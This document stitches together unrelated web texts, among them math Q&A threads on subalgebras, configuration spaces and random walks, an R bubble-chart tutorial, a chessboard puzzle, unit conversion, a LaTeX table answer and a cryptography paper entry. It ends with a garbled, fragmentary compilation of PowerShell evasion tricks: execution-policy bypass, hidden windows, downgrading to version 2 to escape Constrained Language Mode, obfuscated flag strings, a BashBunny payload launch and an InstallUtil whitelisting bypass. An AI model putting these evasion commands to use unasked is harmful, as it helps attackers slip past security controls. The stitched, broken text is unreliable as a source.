# Algebras whose subalgebras are finitely generated
Let $k$ be a commutative ring. Is there a name for those commutative $k$-algebras with the property that every subalgebra is finitely generated? (Equivalently, the partial order of subalgebras is Noetherian.) Can we say something about their structure? Where can I read more about them? I am particularly interested in the cases $k=\mathbb{Z}$ and when $k$ is a field.
Notice that if $k$ is a field then $k[x,y]$ does not have the property, but $k[x]$ does. One can also check directly that the subrings of $\mathbb{Z} \times \mathbb{Z}$ are finitely generated because they are given by $\mathbb{Z}[(n,0)] = \mathbb{Z} \times_{\mathbb{Z}/n} \mathbb{Z}$, where $n \geq 0$. I wonder if there is a more conceptual reason for this.
(Usually an object is called Noetherian if its partial order of subobjects is Noetherian, and this applies for example to (non-abelian) groups and modules. But a ring is usually called Noetherian if its partial order of quotients is Noetherian. This is somewhat confusing. Therefore, although it would be consistent to call a ring Noetherian if its partial order of subrings is Noetherian, this would contradict the usual terminology.)
Edit. If $k$ is a field, then a necessary condition is that the algebra is finitely generated of Krull dimension $\leq 1$. This follows directly from Noether normalization and the fact, already mentioned above, that $k[x,y]$ does not have the property. But this condition is not sufficient, as the example $k[x,y]/(x^2)$ shows.
Summary of the answers so far. Keith Kearnes suggests the terms "supernoetherian" (if $k$ is Noetherian) and "hereditary finitely generated" (which sounds very good). YCor has reduced the general classification to the case of finitely generated $k$-domains (if $k$ is Noetherian). The classification in this case is still open. If $k$ is a field, is it equivalent to Krull dimension $\leq 1$? Is there a characterization if $k$ is not a field?
YCor has also generalized my observation on $\mathbb{Z} \times \mathbb{Z}$: The $k$-algebra $k \times k$ is hereditarily finitely generated if and only if $k$ is Noetherian, because in fact there is an isomorphism of partial orders between ideals of $k$ and subalgebras of $k \times k$ given by $I \mapsto k \cdot (1,1) + I \times \{0\}$.
• About terminology: the confusion, if any, is in the other direction: Noetherian was originally defined for finite generation of ideals in rings and then extended to other contexts.
– YCor
Oct 28, 2016 at 5:52
• For non-fields $k$, even for $k = \mathbb{Z}$, this seems to be a very restrictive property. For example, $\mathbb{Z}[X]$ does not have the property since the ring $\mathbb{Z}[2X,2X^2,2X^3,\ldots]$ is not finitely generated. I wonder (just a guess) if $\mathbb{Z}$-algebras with this property have to be subrings of a finite direct product of localizations of $\mathbb{Z}$ at finitely generated submonoids of the monoid of all positive integers under multiplication, or something like that. Oct 28, 2016 at 6:52
• It seems reasonable to conjecture that when $k$ is a field, these are exactly the finitely generated algebras of Krull dimension $\leq 1$. Oct 28, 2016 at 7:19
• @EricWofsey: I think that $k[x,y]/(x^2)$ is a counterexample to this claim. Oct 28, 2016 at 8:53
• @JesseElliott: It will not be that easy. For instance, finite commutative rings have the property. Oct 28, 2016 at 9:41
Let $k$ be a commutative ring. Is there a name for those commutative $k$-algebras with the property that every subalgebra is finitely generated? $\ldots$ Where can I read more about them?
The paper
Rogalski, D.; Sierra, S. J.; Stafford, J. T., Algebras in which every subalgebra is Noetherian. Proc. Amer. Math. Soc. 142 (2014), no. 9, 2983-2990.
introduces the term supernoetherian for a not-necessarily-commutative $k$-algebra $A$ that has the property that all subalgebras of $A$ are both (i) finitely generated and (ii) Noetherian. In the commutative case, when $k$ is Noetherian, (ii) follows from (i) by the Hilbert Basis Theorem, so these are exactly the $k$-algebras asked about here when $k$ is Noetherian. The authors of this paper consider only the case where $k$ is an algebraically closed field, and in this case they do observe that the commutative supernoetherian algebras have Krull dimension at most $1$, but they do not classify them.
• Thank you. This answers the terminology question. I would call this then "super finitely generated", since my question is not primarily about the property of being Noetherian. Notice that (i) $\Rightarrow$ (ii) needs that $k$ is Noetherian, but in their paper $k$ is just an alg. closed field. Oct 30, 2016 at 19:44
• I found a paper: Hereditarily Finitely Generated Commutative Monoids by J. C. Rosales and J. I. Garcı́a-Garcı́a, Journal of Algebra 221, 723-732 (1999). They use "hereditarily finitely generated" to mean a monoid whose submonoids are all finitely generated. This term might work for you. Oct 30, 2016 at 20:11
• Probably there's no need for new terminology. For instance, Philip Hall (Finiteness conditions for soluble groups, 1954) refers to "the maximal condition for right ideals" (in a ring), "the maximal condition for subgroups" "the maximal condition for normal subgroups", etc. "The maximal condition for subalgebras" can also be found in old papers, e.g. this one: archive.numdam.org/ARCHIVE/CM/CM_1975__31_1/CM_1975__31_1_31_0/…
– YCor
Oct 30, 2016 at 20:38
• @YCor: Thank you. But "ascending chain condition" (ACC) seems to be more standard and refers to arbitrary partial orders. Oct 30, 2016 at 20:45
• @KeithKearnes: This sounds good, especially because it is an adjective in contrast to ACC or maximal condition. Oct 30, 2016 at 20:46
I'll assume that $k$ is noetherian. I'll just write $k$-ACC, or ACC if there is no ambiguity, to mean the ascending chain condition on $k$-subalgebras.
(For arbitrary $k$, $A=k$ is the only $k$-subalgebra of itself, so it satisfies the property while being arbitrarily bad.)
Here's an equivalence which then boils down to the case of a domain:
A $k$-algebra $A$ ($k$ noetherian) has ACC iff the following 3 conditions hold:
(i) $A$ is noetherian;
(ii) the nilradical $N_A$ of $A$ is a finitely generated $k$-module;
(iii) $A/P$ has ACC for every (minimal) prime ideal $P$ of $A$.
Indeed, suppose that $A$ has ACC. (iii) follows immediately.
Let $(I_n)$ be an increasing sequence of ideals; then $(I_n\cap k1_A)$ is an ascending sequence of ideals of $k1_A$ and hence is stationary, say for $n\ge n_0$. Also $(k1_A+I_n)$ is an ascending sequence of $k$-subalgebras of $A$. So there exists $n_1$ (say $\ge n_0$) such that for every $n\ge n_1$ and $x\in I_n$, one can write $x=x'+t1_A$ with $x'\in I_{n_1}$ and $t\in k$. Then $x-x'\in I_n\cap k1_A$ and hence $x-x'\in I_{n_0}$. Thus $x\in I_{n_1}$, whence $I_n=I_{n_1}$ for all $n\ge n_1$. This proves (i).
To prove (ii), use that $A$ is noetherian to write a nested sequence of submodules $0=N_0\le N_1\le \dots\le N_k=N_A$ with each $N_i/N_{i-1}$ isomorphic as an $A$-module to $A/P_i$ for some prime ideal $P_i$. Suppose by contradiction that $N_A$ is not a finitely generated $k$-module; then some $N_i/N_{i-1}$ is not finitely generated either. Since ACC passes to quotient algebras, we can replace $A$ by $A/N_{i-1}$ and suppose that $i=1$. Since $P_1$ annihilates $N_1$ and contains the nilradical, we see that $xy=0$ for all $x,y\in N_1$. Therefore, for every $k$-submodule $V$ of $N_1$, the $k$-subalgebra generated by $V$ is just $k1_A+V$. So if $(V_n)$ is an increasing sequence of submodules, from ACC we deduce that for large $n$, $k1_A+V_n=k1_A+V_{n+1}$ (in other words, the canonical map $V_n/(k1_A\cap V_n)\to V_{n+1}/(k1_A\cap V_{n+1})$ is an isomorphism). Since $k$ is noetherian, $(k1_A\cap V_n)$, as an ascending sequence of $k$-submodules of $k1_A$, is also stationary, say with union $W$. Hence for large $n$ the above canonical map is the inclusion $V_n/W\to V_{n+1}/W$; since it is an isomorphism, $V_{n+1}=V_n$.
Conversely, suppose that (i), (ii), (iii) hold. It is easy to check (see below) that a finite direct product of $k$-algebras with ACC has ACC. By (i), $A$ has finitely many minimal primes $P_i$, so $A/N_A$ embeds as a subalgebra in the finite product $\prod A/P_i$, which has ACC using (iii); hence $A/N_A$ has ACC. Also, it is immediate that if an algebra $A$ has an ideal $I$ that is a finitely generated $k$-module such that $A/I$ has ACC, then $A$ has ACC. Then using (ii), $A$ has ACC.
Fact ($k$ noetherian): the $k$-ACC condition passes to finite direct products.
Proof: it's enough to do it for a product $A\times B$. Let $(H_n)$ be an ascending sequence of subalgebras of $A\times B$. The projections being eventually stationary, we can suppose that the projections of every $H_n$ onto both $A$ and $B$ are surjective. It follows that the intersection $H_n\cap (A\times\{0\})$ is an ideal in $A$. Since $A$ is noetherian (as checked first above; that argument didn't use this finite product claim), this sequence of intersections is stationary, and we're done.
• Thank you. Why is ACC preserved by finite products? This seems to be a nontrivial statement. A subalgebra of a product is not determined by its projections. Oct 30, 2016 at 20:49
• You have to play with both intersections and projections. If $H_1\subset H_2\subset A\times B$ and $H_1$ and $H_2$ have the same projections and intersections then $H_1=H_2$.
– YCor
Oct 30, 2016 at 20:55
• What do you mean by intersection? $A$ is not a subalgebra of $A \times B$. Oct 30, 2016 at 20:55
• Here is a comment about the Noetherian assumption on $k$: A commutative ring $k$ is Noetherian iff the $k$-algebra $k\times k$ is hereditarily finitely generated. Oct 30, 2016 at 22:03
• @KeithKearnes thanks for the remark (there's indeed a canonical poset isomorphism between the poset of ideals in $k$ and the poset of subalgebras of $k\times k$)
– YCor
Oct 30, 2016 at 22:20
---
# cohomology ring of the fundamental group of unordered configuration space
From the lecture notes INTRODUCTION TO CONFIGURATION SPACES AND THEIR APPLICATIONS, p. 18, I find:
Is it possible to derive the cohomology ring $H^*(Conf(S,k)/\Sigma_k;\mathbb{Z}_2)$ from the above theorem?
Question 1: Given a surface $S$, are there any methods to compute the fundamental group of $k$-th unordered configuration space $$\pi_1(Conf(S,k)/\Sigma_k)?$$
Question 2: Given a group $G=\pi_1(Conf(S,k)/\Sigma_k)$, I find $K(G,1)=BG.$ Are there any methods to compute the cohomology ring (cup product structure) $$H^*(BG;\mathbb{Z}_2)?$$
• Question 1: Yes, at least up to an extension problem. The proof of the fact that $Conf(S-Q_k,k)$ is a $K(\pi ,1)$ provides an explicit decomposition of $Conf(S-Q_k,k)$ into a fibration of $K(\pi ',1)$'s.
• Question 2: Yes, at least in theory. One can use the isomorphism $$H^*(BG,k)\cong Ext ^*_{k[G]}(k,k)$$ and the product structure of $Ext$ groups. However, in practice this method is not very convenient; you would be better off looking for some ad hoc method.
---
# What are the cations and anions for the formula calcium iodide?
Calcium iodide (CaI_2) dissociates to form one calcium ion with a 2+ charge, Ca^(2+), and two iodide ions, each with a 1- charge: CaI_2 -> Ca^(2+) + 2 I^-. The calcium ion is a cation because it carries a positive charge. The two iodide ions are anions because they carry a negative charge.
Oxidation numbers help predict which atoms will donate electrons and which atoms will receive electrons in a bond. Calcium has an oxidation number of +2: it can donate two electrons to other atoms. Iodine in this compound has an oxidation state of -1: each iodine will receive one electron from the calcium.
When calcium and 2 iodine atoms form a compound, calcium donates one electron to each iodine, giving calcium the +2 status and each iodine the -1 status.
---
Bubble charts are a great way to represent data whose instances vary greatly in magnitude, e.g. the size of Canada compared to the size of Austria. However, this type of chart introduces a new dimension into the interpretation of the data, because the data is read from the bubble size (area), and not linearly. The mistake when building such charts is to ignore what is known as the illusion of linearity. This illusion (see this article for more) is the effect that people tend to judge proportions linearly even when they are not linear. For example, a common mistake is to think that a pizza with a diameter of 20 cm is two times larger than a pizza with a diameter of 10 cm, while in fact the first pizza is 4 times larger than the second one, because we judge the size of an area and not the diameter: the first pizza has an area of 314 cm² (πr²) and the second one 78.5 cm², and 314/78.5 = 4. Now back to bubble charts…
For this example I have loaded ggplot2 and created a simple dataset with three variables – x, y and size.
library(ggplot2)
dat <- data.frame(x = c(1,2,3), y = c(2,3,1), size = c(10,20,30))
dat
The resulting dataset provides the coordinates and the bubble sizes for the chart. Now lets create the chart with annotated bubble sizes.
q<-ggplot(dat,aes())
q <- q + geom_point(aes(x=x, y=y), size=dat$size) # create bubbles
q <- q + xlim(-1,5) + ylim(-1,5) # add limits to axes
q <- q + annotate("text", x=dat$x, y=dat$y, label=dat$size, color="white", size=6) # add size annotations
q<-q + theme_void() + theme(panel.background = element_rect(fill="lightblue")) #create a simple theme
q
The chart looks like this:
The basic issue is that the smallest bubble looks as if it were 9 times smaller than the largest bubble instead of 3 times smaller, because the size parameter of geom_point sets the diameter and not the area.
To correct for this and to make the chart interpretable we will use the simple transformation of the size parameter in geom_point by square root.
q<-ggplot(dat,aes())
q <- q + geom_point(aes(x=x, y=y), size=sqrt(dat$size)*10) # create bubbles with a correct scale
q <- q + xlim(-1,5) + ylim(-1,5) # add limits to axes
q <- q + annotate("text", x=dat$x, y=dat$y, label=dat$size, color="white", size=6) # add size annotations
q<-q + theme_void() + theme(panel.background = element_rect(fill="lightblue")) #create a simple theme
q
The multiplication of the square root of the size by a factor of 10 is just to make the bubbles large enough relative to the axis limits.
The chart now looks like this:
The areas are now in the correct scale and the bubbles are proportional to the size variable.
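As a side note, ggplot2 also provides scale_size_area(), which applies the same square-root correction automatically when the size is mapped as an aesthetic, so that the plotted area is proportional to the value. A minimal sketch:

q2 <- ggplot(dat, aes(x = x, y = y, size = size)) +
  geom_point() +
  scale_size_area(max_size = 20) + # max_size plays the role of the manual factor of 10
  xlim(-1, 5) + ylim(-1, 5) +
  theme_void() + theme(panel.background = element_rect(fill = "lightblue"))
q2

A bonus of this scale is that it also maps the value 0 to an area of 0, which manual diameter scaling does not.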
Of course, if we wanted to draw three-dimensional shapes, the correction factor would be the cube root, because when the diameter is increased by a factor of n, the volume is increased by a factor of n³.
Happy charting
This post was motivated by a lot of wonderful blogs on http://www.R-bloggers.com
---
# I can't hear you, hexadecimally!
Number Theory Level 2
Dr. Hex is a Physics and Differential Geometry professor at Princeton. On a typical day, he asks one of his students to remember a number, which the student fails to do. He scolds him, saying "You are $\text{DEAF}$ to the sixteenth base!". What number did he ask him to remember?
---
How do you evaluate log_5 5?
${\log}_{5} 5 = 1$
When we write ${\log}_{x} y = z$, we ask to what power we must raise the base $x$ to get $y$: if ${\log}_{x} y = z$, then ${x}^{z} = y$. Any base can be used, but scientists typically assume natural logarithms, ${\log}_{e}$, if the base is not specified, or, more rarely, ${\log}_{10}$.
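For example, ${\log}_{2} 8 = 3$, because ${2}^{3} = 8$.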
Given this, can you tell me ${\log}_{10} 100$, ${\log}_{10} 1000$, and ${\log}_{10} 0.01$? These are all simple whole numbers.
---
# Thread: Evaluate the definite integral...integrating by parts
1. ## Evaluate the definite integral...integrating by parts
So, I have got another problem and can't figure out where is my mistake,
I have the following integral $\int_{2}^{5} t^{4}ln(2t)dt$, I considered $u = ln(2t) => u' = \frac{1}{2t}; v' = t^{4} => v = \frac{t^{5}}{5}$
and proceeded as follows: $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{2t}\frac{t^{5}}{5}dt =$ here, I considered that I can do some simplifications and
obtained that $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{10} t^{4}dt = \left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{5}}{50} =$,
but by evaluating it further and doing all the math I don't get the correct answer,
I saw that and thought that I can't do the simplifications since they are still $u'$ and $v$,
so, I considered them separately, even though it seems wrong for me $\left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{6} ln|2t|}{30}$ , but this also, as I expected, wrong,
please, can someone show me the mistake(s)?
2. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by dokrbb
So, I have got another problem and can't figure out where is my mistake, […]
Did you apply the limits 2 and 5 correctly? Also, the derivative $u'$ is $\frac{1}{t}$, not $\frac{1}{2t}$.
3. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by votan
did you apply the limits 2 and 5 correctly?
with my first evaluation I get 1368.383397, with the second one I have 233.9377581 (but I suppose this one is a priori wrong, so...)
4. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by dokrbb
I considered $u = \ln(2t) \Rightarrow u' = \frac{1}{2t}$
Consider it further
Edit: sorry, votan did say that!
5. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by tom@ballooncalculus
Consider it further
Edit: sorry, votan did say that!
and if you were answering without sarcasm...
6. ## Re: Evaluate the definite integral...integrating by parts
Never mind, I figured it out.
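For completeness, with the corrected derivative $u' = \frac{1}{t}$ the computation becomes $\int_{2}^{5} t^{4}\ln(2t)\,dt = \left[\frac{t^{5}}{5}\ln(2t) - \frac{t^{5}}{25}\right]_{2}^{5} = 625\ln 10 - \frac{32}{5}\ln 4 - \frac{3093}{25} \approx 1306.52$.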
---
# Random walks in $1$, $2$ and $3$ dimensions [closed]
I know that this may seem easy but I have no clue where to start (if possible could you answer this in the simplest way possible)?
Consider a person who is at the position $x=0$ on the $x$-axis at time $0$. At time $t=1$ he moves to $x = 1$ or $x = −1$ with probability $1/2$. After $t$ seconds if he is in position $x$, he will move to $x + 1$ or $x − 1$ with probability $1/2$. Discuss the following questions:
1. What is the probability that he will be back at position $0$?
2. Given a fixed point $X$, what is the probability that he reaches $X$, if we do not mind how long it takes?
3. Discuss the same problem in two and three dimensional space. In $2$D, he moves north, south, west or east, each one with the probability $1/4$. In $3$D there are $6$ directions he might take, each one with probability $1/6$.
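To build intuition (an illustrative sketch, not part of the original question), one can estimate the return probability empirically; Pólya's classical theorem says the walk returns to the origin with probability $1$ in dimensions $1$ and $2$, but only with probability about $0.34$ in dimension $3$:

import random

def return_probability(d, trials=500, max_steps=5000):
    # Estimate the probability that a simple random walk on Z^d
    # comes back to the origin within max_steps steps.
    returns = 0
    for _ in range(trials):
        pos = [0] * d
        for _ in range(max_steps):
            axis = random.randrange(d)           # choose one of the d coordinates
            pos[axis] += random.choice((-1, 1))  # step +1 or -1 along it
            if not any(pos):                     # back at the origin?
                returns += 1
                break
    return returns / trials

for d in (1, 2, 3):
    print(d, return_probability(d))

Since the simulation is truncated at max_steps, it only gives a lower bound on the true return probability.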
Nice question; it doesn't seem that basic to me for higher dimensions. For $1$ dimension the answer is that he will return with probability $1$. – muzzlator Apr 9 '13 at 20:39
can you explain why? – MIMI Apr 9 '13 at 21:06
Start here: math.stackexchange.com/questions/536/… – Byron Schmuland Apr 9 '13 at 21:35
– Byron Schmuland Apr 9 '13 at 21:38
---
# Clone Puzzle: Pebbling the Chessboard
The clone puzzle was recently popularized by a great YouTube presentation by Zvezdelina Stankova on the Numberphile channel (https://www.youtube.com/watch?v=lFQGSGsXbXE). It serves as a good example of some key concepts in mathematics:
• Invariants
• Limits (geometric series)
The game starts with three checkers in the lower-left corner of a quarter-infinite chessboard. A move replaces one checker with two clones, one on the square above and one on the square to the right of the original (both target squares must be empty). The goal is to get all checkers out of the highlighted jail.
You can try to solve the challenge from any of the proposed initial positions, using the CDF version attached, or the source notebook of this post.
The invariant is constructed by assigning the value 1 to the lower-left square; each further square receives half the value of the square below it or to its left, so the square in row $i$ and column $j$ (counted from 0) has value $2^{-(i+j)}$. A move does not change the sum of the values of all occupied squares, since a checker of value $v$ is replaced by two checkers of value $v/2$ each. The total value of the highlighted jail is 2, and the value of the infinite rest of the board is also 2. To win, you would therefore have to fill all squares of the infinite board outside the jail, which is impossible in finitely many moves.
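A quick sanity check of these numbers in the Wolfram Language (a sketch, independent of the puzzle code below):

Sum[2^-(i + j), {i, 0, Infinity}, {j, 0, Infinity}] (* value of the whole board: 4 *)
1 + 1/2 + 1/2                                       (* value of the three jail squares: 2 *)

The geometric double sum factors as $(\sum_i 2^{-i})(\sum_j 2^{-j}) = 2 \cdot 2 = 4$, leaving exactly 2 for the board outside the jail.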
## Programming the Clone Puzzle
Each square of the board is a Button[] with the rendering depending dynamically on the board (which is an array of True/False values).
The board will automatically extend when you approach the top or right edges.
I've used a classless object-oriented approach, that attaches all code to a single unique symbol, with object data stored in additional symbols, all created in a Module[]. The constructor has this outline:
makeBoard[size_,initial_List]:=Module[{clone,board, ...},
board=...;(*array of True/False values *)
aux[]:=...;
clone[undo]:=...;
clone[game]:=...;
clone]
Methods are of the form clone[meth]. The game is set up as a DynamicModule[] with a menu for the initial positions and undo/reset buttons:
ClonePuzzle[]:=With[{pops=Function[{pos,jail},makeBoard[10,pos,jail]->makeBoard[4,pos,jail][image]]@@@sampleLayouts},
Clear[board];
DynamicModule[{board=pops[[1,1]]},
Column[{
SetterBar[Dynamic[board],pops],
Row[{Button["undo",board[undo],Enabled->Dynamic[board[dirty]]],
Button["reset",board[reset],Enabled->Dynamic[board[dirty]]] },ImageSize->Full],
Dynamic[board[game]]
}],SaveDefinitions->True]]
The board rendering creates a table of buttons (in the render[] auxiliary function). The board itself depends only on its size (dim), which avoids unnecessary dynamic updates.
clone[game]:=
Deploy[Framed[Dynamic[GraphicsGrid[
Table[Item[render[i,j],Background->bg[i,j]],{i,dim,1,-1},{j,dim}], Frame->True,ImageSize->Large],
TrackedSymbols:>{dim}]]
];
---
# Convert square meters to square feet
Square feet (ft²) and square meters (m²) are both units of area. The conversion factor is exact: one square foot equals 0.09290304 square meters, and one square meter equals about 10.7639104 square feet:
A[m²] = 0.09290304 × A[ft²]
A[ft²] = 10.7639104 × A[m²]
So to convert from square feet to square meters, simply multiply by 0.0929 (equivalently, divide by 10.764); to go the other way, multiply by 10.764. For example, say you're in the United States and you've purchased a home that's 2,030 square feet, and you want to tell a friend in London how big it is: 2030 × 0.0929 = 188.587 square meters. Likewise, with the rounded factor 0.093, a house of 2,500 square feet is about 232.5 square meters.
Where does the factor come from? The foot is a unit of length in the system of measurement used in the United States; one foot contains 12 inches, which equals 0.3048 meters, so one square foot is (0.3048 m)² = 0.09290304 m² exactly.
The same factor converts prices: to convert a cost per square meter to a cost per square foot, multiply the square meter cost by 0.0929. For a square meter price of $14.60, that rounds out to $1.36 per square foot.
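A minimal code sketch of these conversions (illustrative only; the function names are my own):

SQM_PER_SQFT = 0.09290304        # exact: 0.3048 ** 2
SQFT_PER_SQM = 1 / SQM_PER_SQFT  # about 10.7639104

def sqft_to_sqm(area_sqft):
    return area_sqft * SQM_PER_SQFT

def sqm_to_sqft(area_sqm):
    return area_sqm * SQFT_PER_SQM

def cost_per_sqm_to_cost_per_sqft(cost_per_sqm):
    # A price per square meter spread over the smaller square foot
    return cost_per_sqm * SQM_PER_SQFT

print(sqft_to_sqm(2030))                      # ~188.6 m²
print(cost_per_sqm_to_cost_per_sqft(14.60))   # ~1.36 per ft²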
---
## CryptoDB
### Paper: Equivalent Keys in HFE, C$^*$, and variations
Authors: Christopher Wolf, Bart Preneel
URL: http://eprint.iacr.org/2004/360
In this article, we investigate the question of equivalent keys for two $\mathcal{M}$ultivariate $\mathcal{Q}$uadratic public key schemes, HFE and C$^{*--}$, and improve over a previously known result, to appear at PKC 2005. Moreover, we show a new non-trivial extension of these results to the classes HFE-, HFEv, HFEv-, and C$^{*--}$, which are cryptographically stronger variants of the original HFE and C$^*$ schemes. In particular, we are able to reduce the size of the private --- and hence the public --- key space by at least one order of magnitude. While the results are of independent interest themselves, we also see applications both in cryptanalysis and in memory-efficient implementations.
##### BibTeX
@misc{eprint-2004-12323,
title={Equivalent Keys in HFE, C$^*$, and variations},
booktitle={IACR Eprint archive},
keywords={public-key cryptography / Multivariate Quadratic Equations, Public Key signature, Hidden Field Equations, HFE, HFE-, HFEv, HFEv-, C$^*$, C$^{*--}$},
url={http://eprint.iacr.org/2004/360},
note={Proceedings of Mycrypt 2005, LNCS 3715, pages 33-49. Serge Vaudenay, editor, Springer, 2005. Christopher.Wolf@esat.kuleuven.ac.be 13004 received 16 Dec 2004, last revised 9 Aug 2005},
author={Christopher Wolf and Bart Preneel},
year=2004
}
---
# figure array with top and side captions
I want to have a 3x3 figure array in which parameters change horizontally and vertically.
So I want to end up with captions on the left-hand side of the figure array and on top of it:
cap a cap b cap c
cap d Fig A Fig B Fig C
cap e Fig D Fig E Fig F
cap f Fig G Fig H Fig I
any ideas on how to achieve this?
• The word "caption" carries an inference that it is associated with an item, as in 3a, 3b, 3c for three subfigures. In your case, 6 "captions" for 9 figures would seem to indicate otherwise. Thus, will these "captions" be text but without a reference-able identifier (i.e., for Fig 3, they won't be a-f AND, there will be no \ref{fig3:subfiga} type calls) elsewhere in the document? – Steven B. Segletes Dec 28 '14 at 16:58
• yes, there will be no need to reference calls to the subfigures..the figure will be referenced as the whole array, I jut thought it might help the clarity to indicate those "captions" on the top and side, rather than describing the layout in a global caption at the bottom – vass Dec 28 '14 at 17:04
• Perhaps just sticking the whole thing in a 4x4 tabular would suffice. Do you understand what I am suggesting? – Steven B. Segletes Dec 28 '14 at 17:22
The OP had indicated that these top/side captions were merely text, not associated with a single subfigure, and that the individual subfigures would not be separately referenced. Thus, a tabular should suffice for this need.
\documentclass{article}
\usepackage[demo]{graphicx}
\usepackage{stackengine}
\newcommand\IncG[2][]{\addstackgap{%
  \raisebox{-.5\height}{\includegraphics[#1]{#2}}}}
\begin{document}
\begin{figure}[p]
\begin{tabular}{p{.2\textwidth}p{.2\textwidth}p{.2\textwidth}p{.2\textwidth}}
& Column 1 & Column 2 & Column 3 caption which can go on to some length\\
Row 1 caption which can go on for some length
&\IncG[width=.2\textwidth,height=.2\textwidth]{file11}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file12}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file13}\\
Row 2 caption
&\IncG[width=.2\textwidth,height=.2\textwidth]{file21}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file22}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file23}\\
Row 3 caption
&\IncG[width=.2\textwidth,height=.2\textwidth]{file31}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file32}
&\IncG[width=.2\textwidth,height=.2\textwidth]{file33}\\
\end{tabular}
\caption{this is the main figure caption}
\end{figure}
\end{document}
If you want the row captions to begin higher up on the figures, so that you have more room for row-caption text, then this altered definition for including the figures would help:
\newcommand\IncG[2][]{\addstackgap{%
\raisebox{\dimexpr-\height+\baselineskip\relax}{\includegraphics[#1]{#2}}}}
• perfect, that did the trick! – vass Dec 28 '14 at 20:27
---
# Powershell bypass hidden
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Program Files\CustomApp\bin\launch-customapp.ps1" -uri "%1"
This works great for launching the CustomApp, but the blue Windows PowerShell console flashes up briefly during execution.
In this case, when PowerShell is run through xp_cmdshell, that folder is not included in PSModulePath (this can also happen when you use a different account, because your module currently lives in a profile folder). Now you have two options: reference the module by its path instead of its name. You can use […]
-Noninteractive -ExecutionPolicy Bypass -Noprofile — so this actually gets the PowerShell script to run, because I can see the timestamp added to the text file. Before I added the timestamp I thought the script wasn't executing at all when it actually was (because OneDrive was still installed).
Bypassing Execution Policy: when the execution policy prevents execution of PowerShell scripts, you can still execute them. There is a secret parameter called "-". When you use it, you can pipe a script into powershell.exe and execute it line by line:
Get-Content 'C:\somescript.ps1' | powershell.exe -noprofile -
If you need to bypass the execution policy, add that switch to the command as well. The syntax to bypass the execution policy is shown here:
powershell -executionpolicy bypass -noexit -file c:\fso\helloworld.ps1
It is also possible to run a specific Windows PowerShell command, or a series of commands, from a VBScript script.
A different sense of "hidden": when you use the hidden keyword in a script, you hide the members of a class by default. Hidden members do not display in the default results of the Get-Member cmdlet, IntelliSense, or tab completion results. To display members that you have hidden with the hidden keyword, add the Force parameter to a Get-Member command.
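A minimal sketch of the hidden keyword in action (the class and member names here are invented for illustration):

class Demo {
    hidden [int] $InternalCounter   # omitted from Get-Member, IntelliSense and tab completion by default
    [string] $Name
}
[Demo]::new() | Get-Member          # does not list InternalCounter
[Demo]::new() | Get-Member -Force   # -Force reveals hidden members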
An easy way to do this is by bypassing the execution policy for that single process. Example: powershell.exe -ExecutionPolicy Bypass -File C:\MyUnsignedScript.ps1. Or you can use the shorthand: powershell -ep Bypass C:\MyUnsignedScript.ps1.
Whenever I started a new PowerShell ISE window and tried to run some scripts, it prompted: ".ps1 cannot be loaded because running scripts is disabled on this system." I know that we can set the Bypass policy for the current process via the PowerShell console and click Yes to all:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
The most common way to bypass constrained language mode (CLM) is to simply downgrade to PowerShell version 2, if it is installed. You can do this by appending the '-version 2' argument:
powershell.exe -version 2
If you want to bypass the execution policy as well, then append the following:
powershell.exe -version 2 -ExecutionPolicy bypass
There is no built-in way to launch a PowerShell script hidden: even if you run powershell.exe and specify -WindowStyle Hidden, the PowerShell console will still be visible for a fraction of a second. To launch PowerShell scripts hidden, you can use a VBScript instead (see the example further down).
To change the policy machine-wide, open PowerShell as Administrator. To get your present policy, run Get-ExecutionPolicy (or Get-ExecutionPolicy -List). Then run Set-ExecutionPolicy Unrestricted (or, alternatively, Set-ExecutionPolicy RemoteSigned), type "Y" and press Enter; alternatively, type "A" for yes-to-all.
You can use the PowerShell NoProfile parameter to start and execute a script without a profile:
Powershell.exe -NoProfile -File "D:\PowerShell\ConvertString-toDate.ps1"
In the above, the -NoProfile parameter executes the script specified by the -File parameter without loading a profile; the script converts a string to datetime format and prints it.
On the obfuscation side, the primary focus was initially on argument substrings and shorthand syntax, randomized case, argument ordering and randomized whitespace between the arguments. So instead of always producing something like -nop -win hidden -noni, it may produce something more like -wINd hIdDEn -nOniNT -NOpr -noProf -wI hiDdeN -noNIntEr.
PowerShell Constrained Language Mode Bypass: this builds an executable which executes a Full Language Mode PowerShell session even when Constrained Language Mode is enabled. At the time of writing, the only bypass methods I have found are downgrading to PowerShell version 2 or using Runspaces from .NET. PowerShell version 2 is not […]
By default, PowerShell is configured to prohibit script execution on Windows-based systems. Such settings can complicate the work of administrators, pentesters and developers, and in this article I will talk about 15 ways to bypass the execution policy.
powershell -executionpolicy bypass -File "download files.ps1"
This will bypass the execution policy restricting the script from running and allow it to run without issue.
Summary: use a Windows PowerShell cmdlet to start a hidden process. How can I launch a hidden process by using a Windows PowerShell cmdlet? Use the Start-Process cmdlet and specify a window style of hidden:
Start-Process -WindowStyle hidden -FilePath notepad.exe
Output 100% OK:
Powershell -nop -ex Bypass -w Hidden . ( (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1')
Now on the VM you will see that the output becomes better each time I reduce the string (green part is OK, red is wrong; the commands are broken, but I made this just to test the output).
The hidden characters are still there in Code Block #1 (Bad Character Code) and Code Block #3 (Isolate Bad Character) if you want to cut and paste them into your editor and try this out for yourself. This is why it […]
The PowerShell.exe command-line tool starts a Windows PowerShell session in a Command Prompt window. When you use PowerShell.exe, you can use its optional parameters to customize the session. For example, you can start a session that uses a particular execution policy or one that excludes a Windows PowerShell profile.
Write the PowerShell commands you want to run to a file. The C# uninstall hook will read these commands and execute them inside a Pipeline. Execute uninstallUtil.exe on the exe from step 2 using a […]
